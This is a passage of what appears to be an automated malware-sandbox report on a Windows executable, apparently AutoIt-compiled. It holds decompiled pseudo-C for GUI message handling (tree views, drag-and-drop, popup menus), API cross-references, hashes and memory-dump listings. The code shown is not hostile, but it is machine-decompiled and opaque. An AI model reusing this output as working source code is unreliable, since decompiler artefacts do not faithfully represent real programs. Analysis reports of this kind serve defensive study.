									_t234 = GetWindowLongW( *( *((intOrPtr*)( *((intOrPtr*)(_t231 + _t424 * 4)))) + 0x34), 0xfffffff0);
									__eflags = _t234 & 0x08000000;
									if((_t234 & 0x08000000) != 0) {
										goto L105;
									}
									__eflags =  *(_t418 + 0x28) & 0x00000011;
									_t385 =  *0xe75824; // 0x1569100
									if(( *(_t418 + 0x28) & 0x00000011) == 0) {
										L109:
										_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t385 + _t424 * 4)))) + 0x4c));
										__eflags = _t237 - 0xffffffff;
										if(_t237 != 0xffffffff) {
											 *((intOrPtr*)(_t418 + 0x30)) = _t237;
											_t385 =  *0xe75824; // 0x1569100
										}
										_t240 =  *( *((intOrPtr*)( *((intOrPtr*)(_t385 + _t424 * 4)))) + 0x48);
										__eflags = _t240;
										if(_t240 < 0) {
											goto L105;
										} else {
											__eflags = _v165;
											if(_v165 == 0) {
												L114:
												 *(_t418 + 0x34) = _t240;
												goto L105;
											}
											__eflags =  *(_t418 + 0x24) & 0x00000001;
											if(( *(_t418 + 0x24) & 0x00000001) == 0) {
												goto L105;
											}
											goto L114;
										}
									}
									_t242 =  *((intOrPtr*)( *((intOrPtr*)(_t385 + _t424 * 4))));
									__eflags =  *((char*)(_t242 + 0x90)) - 0x14;
									if( *((char*)(_t242 + 0x90)) != 0x14) {
										goto L8;
									}
									goto L109;
								} else {
									L105:
									_t222 = 0;
									goto L9;
								}
							}
							__eflags = _t224 - 0x13;
							if(_t224 != 0x13) {
								goto L8;
							}
							goto L100;
						}
						__eflags = _t220 - 0xfffffffb;
						if(_t220 == 0xfffffffb) {
							_v165 = 0;
							E00DB2344(0xe757b0, _t421, 1);
							GetCursorPos( &_v164);
							ScreenToClient( *_t418,  &_v164);
							_t388 = E00DB25DB(0xe757b0,  *_t418);
							_v172 = _t388;
							_v176 = _t388;
							__eflags = _t388 - 0xffffffff;
							if(_t388 != 0xffffffff) {
								L78:
								_t249 =  *0xe75824; // 0x1569100
								_v144 = _t388;
								_t252 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 + _t388 * 4)))) + 0x90));
								__eflags = _t252 - 0x10;
								if(_t252 == 0x10) {
									_v140 = _v156.x;
									_v136 = _v156.y;
									_t256 = SendMessageW( *_t418, 0x1111, 0,  &_v140);
									__eflags = _t256;
									if(_t256 == 0) {
										L95:
										ClientToScreen( *_t418,  &_v156);
										_t259 =  *0xe75824; // 0x1569100
										_t390 =  *( *((intOrPtr*)( *((intOrPtr*)(_t259 + _v164.y * 4)))) + 0xc);
										__eflags = _t390;
										if(_t390 == 0) {
											goto L8;
										}
										TrackPopupMenuEx(_t390, 0x80, _v156.x, _v156.y,  *_v120, 0);
										L36:
										_t222 = 1;
										goto L9;
									}
									_v92 = _t256;
									_v96 = 4;
									SendMessageW( *_t418, 0x113e, 0,  &_v96);
									__eflags = _v132 & 0x00000046;
									if((_v132 & 0x00000046) == 0) {
										goto L95;
									}
									_t269 = E00DB2402(0xe757b0, _v60,  &_v148,  &_v164);
									__eflags = _t269;
									if(_t269 == 0) {
										L94:
										_v164.y = _v144;
										goto L95;
									}
									_t392 = _v164.x;
									_t271 =  *0xe75824; // 0x1569100
									_v164.y = _t392;
									_t273 =  *((intOrPtr*)( *((intOrPtr*)(_t271 + _t392 * 4))));
									__eflags =  *(_t273 + 0xc);
									if( *(_t273 + 0xc) != 0) {
										goto L95;
									}
									goto L94;
								}
								__eflags = _t252 - 0x13;
								if(_t252 != 0x13) {
									goto L8;
								}
								_v116 = _v156.x;
								_v112 = _v156.y;
								_t277 = SendMessageW( *_t418, 0x1012, 0,  &_v116);
								__eflags = _t277 - 0xffffffff;
								if(_t277 <= 0xffffffff) {
									L88:
									ClientToScreen( *_t418,  &_v156);
									_t280 =  *0xe75824; // 0x1569100
									_t394 =  *( *((intOrPtr*)( *((intOrPtr*)(_t280 + _v164.y * 4)))) + 0xc);
									__eflags = _t394;
									if(_t394 != 0) {
										TrackPopupMenuEx(_t394, 0, _v156.x, _v156.y,  *_v120, 0);
									}
									goto L8;
								}
								__eflags = _v165;
								if(_v165 != 0) {
									goto L88;
								}
								_v52 = _t277;
								_v56 = 4;
								_t286 = SendMessageW( *_t418, 0x104b, 0,  &_v56);
								__eflags = _t286;
								if(_t286 == 0) {
									goto L8;
								}
								__eflags = _v108 & 0x0000000e;
								if((_v108 & 0x0000000e) == 0) {
									goto L88;
								}
								_t289 = E00DB2402(0xe757b0, _v24,  &_v148,  &_v164);
								__eflags = _t289;
								if(_t289 == 0) {
									L87:
									_v164.y = _v144;
									goto L88;
								}
								_t396 = _v164.x;
								_t291 =  *0xe75824; // 0x1569100
								_v164.y = _t396;
								_t293 =  *( *(_t291 + _t396 * 4));
								__eflags = _t293;
								if(_t293 == 0) {
									goto L87;
								}
								__eflags =  *(_t293 + 0xc);
								if( *(_t293 + 0xc) != 0) {
									goto L88;
								}
								goto L87;
							}
							_t388 = E00DB25DB(0xe757b0, GetParent( *_t418));
							_v164.x = _t388;
							_v168 = _t388;
							__eflags = _t388 - 0xffffffff;
							if(_t388 == 0xffffffff) {
								goto L8;
							}
							_v165 = 1;
							goto L78;
						}
						__eflags = _t220 - 0xfffffffe;
						if(_t220 != 0xfffffffe) {
							goto L8;
						}
						E00DB2344(0xe757b0, _t421, 1);
						GetCursorPos( &_v164);
						ScreenToClient( *_t418,  &_v164);
						_t301 = E00DB25DB(0xe757b0,  *_t418);
						__eflags = _t301 - 0xffffffff;
						if(_t301 == 0xffffffff) {
							goto L8;
						}
						_t400 =  *0xe75824; // 0x1569100
						_t304 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t400 + _t301 * 4)))) + 0x90));
						__eflags = _t304 - 0x10;
						if(_t304 < 0x10) {
							goto L8;
						}
						__eflags = _t304 - 0x11;
						if(_t304 <= 0x11) {
							_v140 = _v156.x;
							_v136 = _v156.y;
							_t308 = SendMessageW( *_t418, 0x1111, 0,  &_v140);
							__eflags = _t308;
							if(_t308 != 0) {
								_v92 = _t308;
								_v96 = 0xc;
								_v84 = 0xf000;
								SendMessageW( *_t418, 0x113e, 0,  &_v96);
								__eflags = _v132 & 0x00000046;
								if((_v132 & 0x00000046) != 0) {
									SendMessageW( *_t418, 0x110b, 9, 0);
									SendMessageW( *_t418, 0x110b, 9, _v128);
								}
							}
							goto L8;
						}
						__eflags = _t304 - 0x13;
						if(_t304 != 0x13) {
							goto L8;
						}
						_v116 = _v156;
						_v112 = _v156.y;
						_t316 = SendMessageW( *_t418, 0x1012, 0,  &_v116);
						__eflags = _t316 - 0xffffffff;
						if(_t316 == 0xffffffff) {
							goto L8;
						}
						_v52 = _t316;
						_v56 = 4;
						SendMessageW( *_t418, 0x104b, 0,  &_v56);
						__eflags = _v108 & 0x0000000e;
						if((_v108 & 0x0000000e) == 0) {
							goto L8;
						}
						_push(0);
						_push(_v24);
						L44:
						E00E3B351();
						goto L8;
					}
					if(__eflags == 0) {
						ReleaseCapture();
						goto L8;
					}
					__eflags = _t220 - 0xfffffec0;
					if(_t220 == 0xfffffec0) {
						L60:
						InvalidateRect( *_t418, 0, 1);
						goto L8;
					}
					__eflags = _t220 - 0xfffffed4;
					if(_t220 == 0xfffffed4) {
						goto L60;
					}
					__eflags = _t220 - 0xffffff93;
					if(_t220 == 0xffffff93) {
						ImageList_SetDragCursorImage( *0xe7585c, 0, 0, 0);
						ImageList_BeginDrag( *0xe7585c, 0, 0xfffffff8, 0xfffffff0);
						SetCapture(_a4);
						 *0xe75860 = _a8;
						_v140 = 0;
						_v132 = 0;
						_v128 = 1;
						E00DB98C0(__ebx,  &_v140);
						_v140 = _a8;
						_v128 = 1;
						E00DB7DE1(__ebx,  &_v116, __eflags, L"@GUI_DRAGID");
						E00DB89B3(0xe76270, _t414, _t418, __eflags,  &_v120,  &_v144, 1);
						E00DB5904( &_v132);
						_t434 = _t418 + 0x20;
						ClientToScreen( *_t418, _t434);
						ImageList_DragEnter(0,  *_t434,  *(_t418 + 0x24));
						E00DB98C0(__ebx,  &_v156);
					} else {
						__eflags = _t220 - 0xffffff94;
						if(_t220 == 0xffffff94) {
							_t435 =  *((intOrPtr*)(_t418 + 4));
							_t339 = E00DB2402(0xe757b0, _t435,  &_v148,  &_v164);
							__eflags = _t339;
							if(_t339 != 0) {
								_t340 =  *0xe75824; // 0x1569100
								_push(0);
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t340 + _v164.x * 4)))) + 0x96)) =  *(_t418 + 0x10);
								_push( *((intOrPtr*)(_t418 + 4)));
								E00E3B351();
								_t415 =  *0xe75824; // 0x1569100
								_t409 = _v172;
								_t345 =  *((intOrPtr*)( *((intOrPtr*)(_t415 + _v172 * 4))));
								__eflags =  *(_t345 + 0x28);
								if( *(_t345 + 0x28) > 0) {
									 *0xe757ec = _t435;
									E00DB8047(0xe757f0,  *((intOrPtr*)( *((intOrPtr*)(_t415 + _t409 * 4)))) + 0x24);
									_t350 =  *0xe75824; // 0x1569100
									 *0xe75800 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t350 + _v165 * 4)))) + 0x98));
									SendMessageW( *_t418, 0x1030,  *(_t418 + 0x10), 0xe3b348);
								}
							}
						}
					}
					goto L8;
				}
				if(_t445 == 0) {
					L45:
					_t436 = 0;
					_t355 = SendMessageW( *_t418, 0x110a, 9, 0);
					__eflags = _t355;
					if(_t355 == 0) {
						goto L8;
					}
					_v92 = _t355;
					_v96 = 4;
					_t357 = SendMessageW( *_t418, 0x113e, 0,  &_v96);
					__eflags = _t357;
					if(_t357 == 0) {
						goto L8;
					}
					__eflags =  *(_t418 + 0x34) -  *((intOrPtr*)(_t418 + 0x5c));
					if( *(_t418 + 0x34) ==  *((intOrPtr*)(_t418 + 0x5c))) {
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t418 + 0xc)) - 0x1000;
					if( *((intOrPtr*)(_t418 + 0xc)) == 0x1000) {
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t418 + 0xc)) - 1;
					L26:
					if(__eflags == 0) {
						goto L8;
					}
					_push(_t436);
					_push(_v60);
					goto L44;
				}
				_t446 = _t220 - 0xfffffdd9;
				if(_t446 > 0) {
					__eflags = _t220 - 0xfffffdda;
					if(_t220 == 0xfffffdda) {
						_t359 = GetKeyState(0x11);
						__eflags = _t359;
						if(_t359 >= 0) {
							goto L8;
						}
						_t360 = GetKeyState(9);
						__eflags = _t360;
						if(_t360 >= 0) {
							goto L8;
						}
						_t438 = SendMessageW( *_t418, 0x130b, 0, 0);
						_t362 = GetKeyState(0x10);
						__eflags = _t362;
						if(_t362 >= 0) {
							_t439 = _t438 + 1;
							__eflags = _t439;
						} else {
							_t439 = _t438 - 1;
						}
						_push(_t439);
						L43:
						_push( *((intOrPtr*)(_t418 + 4)));
						goto L44;
					}
					__eflags = _t220 - 0xfffffdee;
					if(_t220 == 0xfffffdee) {
						__eflags =  *(_t421 + 0x188);
						if( *(_t421 + 0x188) == 0) {
							goto L8;
						}
						_t416 =  *0xe75834; // 0x2
						_t413 = 3;
						__eflags = _t416 - 0xfffffdd9;
						if(_t416 < 0xfffffdd9) {
							goto L8;
						}
						_t440 =  *0xe75824; // 0x1569100
						do {
							_t364 =  *( *(_t440 + _t413 * 4));
							__eflags = _t364;
							if(_t364 == 0) {
								goto L33;
							}
							__eflags = ( *(_t364 + 0x93) & 0x000000ff) -  *((intOrPtr*)(_t418 + 4));
							if(( *(_t364 + 0x93) & 0x000000ff) ==  *((intOrPtr*)(_t418 + 4))) {
								break;
							}
							L33:
							_t413 = _t413 + 1;
							__eflags = _t413 - _t416;
						} while (_t413 <= _t416);
						__eflags = _t413 - _t416;
						if(_t413 > _t416) {
							goto L8;
						}
						E00DD40BB(_t418 + 0x10,  *((intOrPtr*)( *( *(_t440 + _t413 * 4)) + 0x54)), 0x4f);
						__eflags = 0;
						 *((short*)(_t418 + 0xae)) = 0;
						goto L36;
					}
					__eflags = _t220 - 0xfffffe3d;
					if(_t220 == 0xfffffe3d) {
						goto L45;
					}
					__eflags = _t220 - 0xfffffe64;
					if(_t220 != 0xfffffe64) {
						goto L8;
					}
					_t371 =  *_t418;
					_v148 = _t371;
					_t372 = GetWindowLongW(_t371, 0xfffffff0);
					__eflags = _t372 & 0x00000100;
					if((_t372 & 0x00000100) == 0) {
						goto L8;
					}
					__eflags =  *((short*)(_t418 + 0xc)) - 0x20;
					if( *((short*)(_t418 + 0xc)) != 0x20) {
						goto L8;
					}
					_t436 = 0;
					_t373 = SendMessageW(_v148, 0x110a, 9, 0);
					__eflags = _t373;
					if(_t373 == 0) {
						goto L8;
					}
					_v92 = _t373;
					_v96 = 4;
					__eflags = SendMessageW(_v148, 0x113e, 0,  &_v96);
					goto L26;
				}
				if(_t446 == 0) {
					_t220 = SendMessageW( *_t418, 0x130b, 0, 0);
					L17:
					_push(_t220);
					goto L43;
				}
				if(_t220 == 0xfffffd09) {
					__eflags =  *((char*)(_t421 + 0x199));
					 *((char*)(_t421 + 0x19a)) = 1;
					if( *((char*)(_t421 + 0x199)) != 0) {
						goto L8;
					} else {
						 *((char*)(_t421 + 0x19a)) = 0;
						_push( *(_t418 + 8));
						goto L43;
					}
				}
				if(_t220 == 0xfffffd0e) {
					 *((char*)(_t421 + 0x199)) = 1;
					goto L8;
				}
				if(_t220 == 0xfffffd0f) {
					__eflags =  *((char*)(_t421 + 0x19a)) - 1;
					if( *((char*)(_t421 + 0x19a)) == 1) {
						_push(_t220);
						_push( *((intOrPtr*)(_t418 + 4)));
						E00E3B351();
					}
					 *((short*)(_t421 + 0x199)) = 0;
					goto L8;
				}
				if(_t220 == 0xfffffd16) {
					goto L17;
				}
				goto L8;
			}

0x00e3cad2
0x00e3cad7
0x00e3cadd
0x00e3cae0
0x00e3caec
0x00e3caee
0x00e3caf1
0x00e3caf5
0x00e3caf7
0x00e3cd63
0x00e3cd66
0x00e3cf0b
0x00e3cf0e
0x00e3d2c9
0x00e3d2ce
0x00e3d2d2
0x00e3d2d5
0x00e3cb2e
0x00e3cb37
0x00e3cb3d
0x00e3cb42
0x00e3cb42
0x00e3d2db
0x00e3d2e4
0x00e3d2e6
0x00e3d2ec
0x00e3d2ee
0x00e3d2f8
0x00e3d2fb
0x00e3d2fb
0x00e3d2fc
0x00e3d3b2
0x00000000
0x00e3d3b2
0x00e3d302
0x00e3d302
0x00e3d307
0x00000000
0x00000000
0x00e3d30d
0x00e3d314
0x00e3d318
0x00e3d31a
0x00e3d31a
0x00e3d32e
0x00e3d333
0x00e3d335
0x00e3d33e
0x00e3d343
0x00e3d351
0x00e3d357
0x00e3d35c
0x00000000
0x00000000
0x00e3d35e
0x00e3d362
0x00e3d368
0x00e3d37c
0x00e3d381
0x00e3d384
0x00e3d387
0x00e3d389
0x00e3d38c
0x00e3d38c
0x00e3d397
0x00e3d39a
0x00e3d39c
0x00000000
0x00e3d39e
0x00e3d39e
0x00e3d3a3
0x00e3d3ab
0x00e3d3ab
0x00000000
0x00e3d3ab
0x00e3d3a5
0x00e3d3a9
0x00000000
0x00000000
0x00000000
0x00e3d3a9
0x00e3d39c
0x00e3d36d
0x00e3d36f
0x00e3d376
0x00000000
0x00000000
0x00000000
0x00e3d337
0x00e3d337
0x00e3d337
0x00000000
0x00e3d337
0x00e3d335
0x00e3d2f0
0x00e3d2f2
0x00000000
0x00000000
0x00000000
0x00e3d2f2
0x00e3cf14
0x00e3cf17
0x00e3d07c
0x00e3d083
0x00e3d08d
0x00e3d09a
0x00e3d0a9
0x00e3d0ab
0x00e3d0af
0x00e3d0b3
0x00e3d0b6
0x00e3d0e0
0x00e3d0e0
0x00e3d0e5
0x00e3d0ee
0x00e3d0f4
0x00e3d0f6
0x00e3d1f3
0x00e3d1fb
0x00e3d20c
0x00e3d212
0x00e3d214
0x00e3d27a
0x00e3d281
0x00e3d28b
0x00e3d295
0x00e3d298
0x00e3d29a
0x00000000
0x00000000
0x00e3d2b5
0x00e3cca6
0x00e3cca8
0x00000000
0x00e3cca8
0x00e3d216
0x00e3d227
0x00e3d22f
0x00e3d235
0x00e3d23a
0x00000000
0x00000000
0x00e3d252
0x00e3d257
0x00e3d259
0x00e3d272
0x00e3d276
0x00000000
0x00e3d276
0x00e3d25b
0x00e3d25f
0x00e3d264
0x00e3d26b
0x00e3d26d
0x00e3d270
0x00000000
0x00000000
0x00000000
0x00e3d270
0x00e3d0fc
0x00e3d0fe
0x00000000
0x00000000
0x00e3d10a
0x00e3d112
0x00e3d123
0x00e3d129
0x00e3d12c
0x00e3d1ab
0x00e3d1b2
0x00e3d1bc
0x00e3d1c6
0x00e3d1c9
0x00e3d1cb
0x00e3d1e2
0x00e3d1e2
0x00000000
0x00e3d1cb
0x00e3d12e
0x00e3d133
0x00000000
0x00000000
0x00e3d135
0x00e3d149
0x00e3d154
0x00e3d15a
0x00e3d15c
0x00000000
0x00000000
0x00e3d162
0x00e3d167
0x00000000
0x00000000
0x00e3d17f
0x00e3d184
0x00e3d186
0x00e3d1a3
0x00e3d1a7
0x00000000
0x00e3d1a7
0x00e3d188
0x00e3d18c
0x00e3d191
0x00e3d198
0x00e3d19a
0x00e3d19c
0x00000000
0x00000000
0x00e3d19e
0x00e3d1a1
0x00000000
0x00000000
0x00000000
0x00e3d1a1
0x00e3d0c8
0x00e3d0ca
0x00e3d0ce
0x00e3d0d2
0x00e3d0d5
0x00000000
0x00000000
0x00e3d0db
0x00000000
0x00e3d0db
0x00e3cf1d
0x00e3cf20
0x00000000
0x00000000
0x00e3cf30
0x00e3cf3a
0x00e3cf47
0x00e3cf51
0x00e3cf56
0x00e3cf59
0x00000000
0x00000000
0x00e3cf5f
0x00e3cf6a
0x00e3cf70
0x00e3cf72
0x00000000
0x00000000
0x00e3cf78
0x00e3cf7a
0x00e3cff5
0x00e3cffd
0x00e3d00e
0x00e3d014
0x00e3d016
0x00e3d01c
0x00e3d02d
0x00e3d035
0x00e3d03d
0x00e3d043
0x00e3d048
0x00e3d05e
0x00e3d06d
0x00e3d06d
0x00e3d048
0x00000000
0x00e3d016
0x00e3cf7c
0x00e3cf7e
0x00000000
0x00000000
0x00e3cf8a
0x00e3cf92
0x00e3cfa3
0x00e3cfa9
0x00e3cfac
0x00000000
0x00000000
0x00e3cfb2
0x00e3cfc6
0x00e3cfd1
0x00e3cfd7
0x00e3cfdc
0x00000000
0x00000000
0x00e3cfe2
0x00e3cfe3
0x00e3ccf6
0x00e3ccf6
0x00000000
0x00e3ccf6
0x00e3cd6c
0x00e3cf00
0x00000000
0x00e3cf00
0x00e3cd72
0x00e3cd77
0x00e3ceef
0x00e3cef5
0x00000000
0x00e3cef5
0x00e3cd7d
0x00e3cd82
0x00000000
0x00000000
0x00e3cd88
0x00e3cd8b
0x00e3ce4d
0x00e3ce60
0x00e3ce69
0x00e3ce76
0x00e3ce7b
0x00e3ce7f
0x00e3ce83
0x00e3ce8b
0x00e3ce98
0x00e3cea1
0x00e3cea5
0x00e3ceba
0x00e3cec3
0x00e3cec8
0x00e3cece
0x00e3cedb
0x00e3cee5
0x00e3cd91
0x00e3cd91
0x00e3cd94
0x00e3cd9a
0x00e3cdad
0x00e3cdb2
0x00e3cdb4
0x00e3cdba
0x00e3cdc3
0x00e3cdce
0x00e3cdd5
0x00e3cdd8
0x00e3cddd
0x00e3cde3
0x00e3cdea
0x00e3cdec
0x00e3cdf0
0x00e3cdf6
0x00e3ce0a
0x00e3ce0f
0x00e3ce28
0x00e3ce37
0x00e3ce37
0x00e3cdf0
0x00e3cdb4
0x00e3cd94
0x00000000
0x00e3cd8b
0x00e3cafd
0x00e3cd00
0x00e3cd00
0x00e3cd0c
0x00e3cd12
0x00e3cd14
0x00000000
0x00000000
0x00e3cd1a
0x00e3cd2b
0x00e3cd33
0x00e3cd39
0x00e3cd3b
0x00000000
0x00000000
0x00e3cd44
0x00e3cd47
0x00000000
0x00000000
0x00e3cd4d
0x00e3cd54
0x00000000
0x00000000
0x00e3cd5a
0x00e3cc31
0x00e3cc31
0x00000000
0x00000000
0x00e3cc37
0x00e3cc38
0x00000000
0x00e3cc38
0x00e3cb08
0x00e3cb0a
0x00e3cba1
0x00e3cba6
0x00e3ccb6
0x00e3ccb8
0x00e3ccbb
0x00000000
0x00000000
0x00e3ccc3
0x00e3ccc5
0x00e3ccc8
0x00000000
0x00000000
0x00e3cce1
0x00e3cce3
0x00e3cce9
0x00e3ccec
0x00e3ccf1
0x00e3ccf1
0x00e3ccee
0x00e3ccee
0x00e3ccee
0x00e3ccf2
0x00e3ccf3
0x00e3ccf3
0x00000000
0x00e3ccf3
0x00e3cbac
0x00e3cbb1
0x00e3cc41
0x00e3cc48
0x00000000
0x00000000
0x00e3cc4e
0x00e3cc56
0x00e3cc57
0x00e3cc59
0x00000000
0x00000000
0x00e3cc5f
0x00e3cc65
0x00e3cc68
0x00e3cc6a
0x00e3cc6c
0x00000000
0x00000000
0x00e3cc75
0x00e3cc78
0x00000000
0x00000000
0x00e3cc7a
0x00e3cc7a
0x00e3cc7b
0x00e3cc7b
0x00e3cc7f
0x00e3cc81
0x00000000
0x00000000
0x00e3cc95
0x00e3cc9d
0x00e3cc9f
0x00000000
0x00e3cc9f
0x00e3cbb7
0x00e3cbbc
0x00000000
0x00000000
0x00e3cbc2
0x00e3cbc7
0x00000000
0x00000000
0x00e3cbcd
0x00e3cbd2
0x00e3cbd6
0x00e3cbdc
0x00e3cbe1
0x00000000
0x00000000
0x00e3cbe7
0x00e3cbec
0x00000000
0x00000000
0x00e3cbf2
0x00e3cc00
0x00e3cc06
0x00e3cc08
0x00000000
0x00000000
0x00e3cc0e
0x00e3cc21
0x00e3cc2f
0x00000000
0x00e3cc2f
0x00e3cb10
0x00e3cb95
0x00e3cb9b
0x00e3cb9b
0x00000000
0x00e3cb9b
0x00e3cb17
0x00e3cb6b
0x00e3cb72
0x00e3cb79
0x00000000
0x00e3cb7b
0x00e3cb7b
0x00e3cb82
0x00000000
0x00e3cb82
0x00e3cb79
0x00e3cb1e
0x00e3cb62
0x00000000
0x00e3cb62
0x00e3cb25
0x00e3cb45
0x00e3cb4c
0x00e3cb4e
0x00e3cb4f
0x00e3cb52
0x00e3cb52
0x00e3cb57
0x00000000
0x00e3cb57
0x00e3cb2c
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E3CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3CB95
GetWindowLongW.USER32(?,000000F0), ref: 00E3CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E3CC00
SendMessageW.USER32 ref: 00E3CC29
_wcsncpy.LIBCMT ref: 00E3CC95
GetKeyState.USER32 ref: 00E3CCB6
GetKeyState.USER32 ref: 00E3CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3CCD9
GetKeyState.USER32 ref: 00E3CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E3CD0C
SendMessageW.USER32 ref: 00E3CD33
SendMessageW.USER32(?,00001030,?,00E3B348), ref: 00E3CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E3CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E3CE60
SetCapture.USER32(?), ref: 00E3CE69
ClientToScreen.USER32(?,?), ref: 00E3CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E3CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E3CEF5
ReleaseCapture.USER32(?,?,?), ref: 00E3CF00
GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 00E3CF3A
ScreenToClient.USER32 ref: 00E3CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00E3CFA3
SendMessageW.USER32 ref: 00E3CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00E3D00E
SendMessageW.USER32 ref: 00E3D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E3D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E3D06D
GetCursorPos.USER32(?), ref: 00E3D08D
ScreenToClient.USER32 ref: 00E3D09A
GetParent.USER32(?), ref: 00E3D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00E3D123
SendMessageW.USER32 ref: 00E3D154
ClientToScreen.USER32(?,?), ref: 00E3D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E3D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00E3D20C
SendMessageW.USER32 ref: 00E3D22F
ClientToScreen.USER32(?,?), ref: 00E3D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E3D2B5

Part of subcall function 00DB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DB25EC

GetWindowLongW.USER32(?,000000F0), ref: 00E3D351

Strings

pb, xrefs: 00E3CEAF
F, xrefs: 00E3D235
@GUI_DRAGID, xrefs: 00E3CE9C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pb
API String ID: 3977979337-96320988
Opcode ID: 90ef5962362ac165f8de02fdc9c04f8020c4327ddf395303754435f88cdc9e2d
Instruction ID: a442751f42f2cf63f2c2afae9a965543d3956406e9d120ee81696a7e140d20de
Opcode Fuzzy Hash: 90ef5962362ac165f8de02fdc9c04f8020c4327ddf395303754435f88cdc9e2d
Instruction Fuzzy Hash: 2642CC35604240AFDB24CF25D849EAABFE5FF48314F242929F599B72B0C771D844DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E37DDB, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00E37DDB(signed int _a4, long _a8, WCHAR* _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v32;
				WCHAR* _v36;
				intOrPtr _v40;
				signed char _v44;
				long _v48;
				void* _v52;
				signed int _v72;
				intOrPtr _v80;
				WCHAR* _v84;
				intOrPtr _v88;
				unsigned int _v92;
				intOrPtr _v96;
				long _v100;
				void* _v104;
				signed short _v114;
				signed short _v118;
				void* _v120;
				char _v124;
				signed int _v128;
				signed int _v140;
				void* _v148;
				void* _v152;
				intOrPtr _v160;
				intOrPtr _v164;
				signed int _v188;
				intOrPtr _v196;
				char _v200;
				void* __ebx;
				void* __edi;
				intOrPtr _t167;
				signed int _t169;
				signed int _t170;
				signed int _t177;
				long _t184;
				signed int _t186;
				void* _t189;
				short _t192;
				WCHAR* _t194;
				signed int _t198;
				long _t214;
				signed int _t220;
				long _t221;
				WCHAR* _t224;
				signed int _t225;
				long _t233;
				signed int _t235;
				signed int _t241;
				signed int _t244;
				long _t246;
				signed int _t248;
				signed int _t255;
				int _t256;
				long _t258;
				long _t260;
				int _t263;
				signed int _t265;
				long _t267;
				signed int _t272;
				long _t274;
				int _t280;
				WCHAR* _t281;
				struct HWND__** _t285;
				WCHAR* _t292;
				signed char _t321;
				signed int _t325;
				WCHAR* _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed int _t350;
				void* _t356;
				int _t357;
				long _t361;
				struct HWND__* _t368;
				signed int _t370;
				WCHAR* _t372;
				int _t373;
				signed int _t376;

				if(E00DB2402(0xe757b0, _a4,  &_v124,  &_v12) != 0) {
					_t167 =  *0xe75824; // 0x1569100
					_t280 = _a8;
					 *_t280 =  *_t280 | 0xffffffff;
					_t285 =  *( *(_t167 + _v12 * 4));
					_v12 = _t285;
					_t169 = _t285[0x24] & 0x000000ff;
					_t368 =  *_t285;
					_a8 = _t368;
					__eflags = _t169 - 0x11;
					if(__eflags > 0) {
						__eflags = _t169 - 0x12;
						if(_t169 == 0x12) {
							__eflags = 0;
							_push(0);
							_push(0);
							_push(0x400);
							L88:
							_t170 = SendMessageW(_t368, ??, ??, ??);
							L89:
							 *_t280 = _t170;
							goto L90;
						}
						__eflags = _t169 - 0x13;
						if(_t169 == 0x13) {
							 *_t280 = SendMessageW(_t368, 0x100c, 0xffffffff, 2);
							E00DD2DE0( &_v104, 0, 0x34);
							_v100 =  *_t280;
							_v104 = 4;
							_t177 = SendMessageW(_a8, 0x104b, 0,  &_v104);
							asm("sbb eax, eax");
							_t170 =  ~_t177 & _v72;
							goto L89;
						}
						__eflags = _t169 - 0x14;
						if(_t169 == 0x14) {
							 *_t280 =  *_t280 | 0xffffffff;
							_a8 = GetWindowLongW(_t285[0xd], 0xffffffec);
							E00DD2DE0( &_v104, 0, 0x34);
							_t370 = _v12;
							_v140 = _a4;
							_v148 = 1;
							_t184 = SendMessageW( *(_t370 + 0x34), 0x1053, 0xffffffff,  &_v148);
							_v100 = _t184;
							__eflags = _t184 - 0xffffffff;
							if(_t184 == 0xffffffff) {
								goto L90;
							}
							__eflags = _a8 & 0x00000004;
							if(__eflags == 0) {
								L81:
